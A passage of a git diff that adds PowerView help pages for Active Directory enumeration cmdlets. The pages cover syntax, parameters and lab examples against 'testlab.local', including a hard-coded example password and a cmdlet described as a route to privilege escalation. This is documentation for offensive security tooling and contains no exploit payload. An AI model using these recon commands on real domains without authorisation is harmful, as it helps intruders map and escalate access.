+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Raw

+Switch.

+Return raw results instead of translating the fields into a custom PSObject.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.Group

+

+Custom PSObject with translated group property fields.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainGroupMember.md b/docs/Recon/Get-DomainGroupMember.md
new file mode 100755
index 0000000..5381b2c
--- /dev/null
+++ b/docs/Recon/Get-DomainGroupMember.md
@@ -0,0 +1,401 @@
+# Get-DomainGroupMember

+

+## SYNOPSIS

+Return the members of a specific domain group.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID

+

+## SYNTAX

+

+### None (Default)

+```

+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]

+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]

+ [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+### ManualRecurse

+```

+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-Recurse] [-LDAPFilter <String>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+### RecurseUsingMatchingRule

+```

+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-RecurseUsingMatchingRule]

+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone]

+ [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for the specified

+group matching the criteria.

+Each result is then rebound and the full user

+or group object is returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainGroupMember "Desktop Admins"

+```

+

+GroupDomain             : testlab.local

+GroupName               : Desktop Admins

+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local

+MemberDomain            : testlab.local

+MemberName              : Testing Group

+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local

+MemberObjectClass       : group

+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1129

+

+GroupDomain             : testlab.local

+GroupName               : Desktop Admins

+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local

+MemberDomain            : testlab.local

+MemberName              : arobbins.a

+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local

+MemberObjectClass       : user

+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+'Desktop Admins' | Get-DomainGroupMember -Recurse

+```

+

+GroupDomain             : testlab.local

+GroupName               : Desktop Admins

+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local

+MemberDomain            : testlab.local

+MemberName              : Testing Group

+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local

+MemberObjectClass       : group

+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1129

+

+GroupDomain             : testlab.local

+GroupName               : Testing Group

+GroupDistinguishedName  : CN=Testing Group,CN=Users,DC=testlab,DC=local

+MemberDomain            : testlab.local

+MemberName              : harmj0y

+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local

+MemberObjectClass       : user

+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1108

+

+GroupDomain             : testlab.local

+GroupName               : Desktop Admins

+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local

+MemberDomain            : testlab.local

+MemberName              : arobbins.a

+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local

+MemberObjectClass       : user

+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule

+```

+

+GroupDomain             : testlab.local

+GroupName               : Desktop Admins

+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local

+MemberDomain            : testlab.local

+MemberName              : harmj0y

+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local

+MemberObjectClass       : user

+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1108

+

+GroupDomain             : testlab.local

+GroupName               : Desktop Admins

+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local

+MemberDomain            : testlab.local

+MemberName              : arobbins.a

+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local

+MemberObjectClass       : user

+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember

+```

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember

+```

+

+### -------------------------- EXAMPLE 6 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'

+

+### -------------------------- EXAMPLE 7 --------------------------

+```

+Get-Domain | Select-Object -Expand name

+```

+

+testlab.local

+

+'dev\domain admins' | Get-DomainGroupMember -Verbose

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainGroupMember\] Extracted domain 'dev.testlab.local' from 'dev\domain admins'

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local

+VERBOSE: \[Get-DomainGroupMember\] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))

+

+GroupDomain             : dev.testlab.local

+GroupName               : Domain Admins

+GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local

+MemberDomain            : dev.testlab.local

+MemberName              : user1

+MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local

+MemberObjectClass       : user

+MemberSID               : S-1-5-21-339048670-1233568108-4141518690-201108

+

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))

+GroupDomain             : dev.testlab.local

+GroupName               : Domain Admins

+GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local

+MemberDomain            : dev.testlab.local

+MemberName              : Administrator

+MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local

+MemberObjectClass       : user

+MemberSID               : S-1-5-21-339048670-1233568108-4141518690-500

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+Group1), DistinguishedName (e.g.

+CN=group1,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)

+specifying the group to query for.

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Recurse

+Switch.

+If the group member is a group, recursively try to query its members as well.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ManualRecurse

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RecurseUsingMatchingRule

+Switch.

+Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.

+Much faster than manual recursion, but doesn't reveal cross-domain groups,

+and only returns user accounts (no nested group objects themselves).

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: RecurseUsingMatchingRule

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.GroupMember

+

+Custom PSObject with translated group member property fields.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/](http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/)

+

diff --git a/docs/Recon/Get-DomainManagedSecurityGroup.md b/docs/Recon/Get-DomainManagedSecurityGroup.md
new file mode 100755
index 0000000..13d48a2
--- /dev/null
+++ b/docs/Recon/Get-DomainManagedSecurityGroup.md
@@ -0,0 +1,177 @@
+# Get-DomainManagedSecurityGroup

+

+## SYNOPSIS

+Returns all security groups in the current (or target) domain that have a manager set.

+

+Author: Stuart Morgan (@ukstufus) \<stuart.morgan@mwrinfosecurity.com\>, Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl

+

+## SYNTAX

+

+```

+Get-DomainManagedSecurityGroup [[-Domain] <String>] [-SearchBase <String>] [-Server <String>]

+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]

+ [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Authority to manipulate the group membership of AD security groups and distribution groups

+can be delegated to non-administrators by setting the 'managedBy' attribute.

+This is typically

+used to delegate management authority to distribution groups, but Windows supports security groups

+being managed in the same way.

+

+This function searches for AD groups which have a group manager set, and determines whether that

+user can manipulate group membership.

+This could be a useful method of horizontal privilege

+escalation, especially if the manager can manipulate the membership of a privileged group.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv

+```

+

+Store a list of all security groups with managers in group-managers.csv

+

+## PARAMETERS

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ManagedSecurityGroup

+

+A custom PSObject describing the managed security group.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainOU.md b/docs/Recon/Get-DomainOU.md
new file mode 100755
index 0000000..cc1fd39
--- /dev/null
+++ b/docs/Recon/Get-DomainOU.md
@@ -0,0 +1,316 @@
+# Get-DomainOU

+

+## SYNOPSIS

+Search for all organization units (OUs) or specific OU objects in AD.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty

+

+## SYNTAX

+

+```

+Get-DomainOU [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]

+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]

+ [-Credential <PSCredential>] [-Raw]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for all objects

+matching the criteria.

+To only return specific properies, use

+"-Properties whencreated,usnchanged,...".

+By default, all OU objects for

+the current domain are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainOU

+```

+

+Returns the current OUs in the domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainOU *admin* -Domain testlab.local

+```

+

+Returns all OUs with "admin" in their name in the testlab.local domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"

+```

+

+Returns all OUs with linked to the specified group policy object.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+"*admin*","*server*" | Get-DomainOU

+```

+

+Search for OUs with the specific names.

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainOU -Credential $Cred

+

+## PARAMETERS

+

+### -Identity

+An OU name (e.g.

+TestOU), DistinguishedName (e.g.

+OU=TestOU,DC=testlab,DC=local), or

+GUID (e.g.

+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a).

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -GPLink

+Only return OUs with the specified GUID in their gplink property.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: GUID

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Raw

+Switch.

+Return raw results instead of translating the fields into a custom PSObject.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.OU

+

+Custom PSObject with translated OU property fields.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainObject.md b/docs/Recon/Get-DomainObject.md
new file mode 100755
index 0000000..f900c53
--- /dev/null
+++ b/docs/Recon/Get-DomainObject.md
@@ -0,0 +1,318 @@
+# Get-DomainObject

+

+## SYNOPSIS

+Return all (or specified) domain objects in AD.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName

+

+## SYNTAX

+

+```

+Get-DomainObject [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]

+ [-Raw]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for all objects

+matching the criteria.

+To only return specific properies, use

+"-Properties samaccountname,usnchanged,...".

+By default, all objects for

+the current domain are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainObject -Domain testlab.local

+```

+

+Return all objects for the testlab.local domain

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname

+```

+

+distinguishedname

+-----------------

+CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local

+CN=dfm,CN=Users,DC=testlab,DC=local

+OU=OU3,DC=testlab,DC=local

+CN=dfm (admin),CN=Users,DC=testlab,DC=local

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainObject -Credential $Cred -Identity 'windows1'

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Get-Domain | Select-Object -Expand name

+```

+

+testlab.local

+

+'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainUser\] Extracted domain 'testlab.local' from 'testlab\harmj0y'

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))

+

+distinguishedname

+-----------------

+CN=harmj0y,CN=Users,DC=testlab,DC=local

+VERBOSE: \[Get-DomainUser\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))

+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

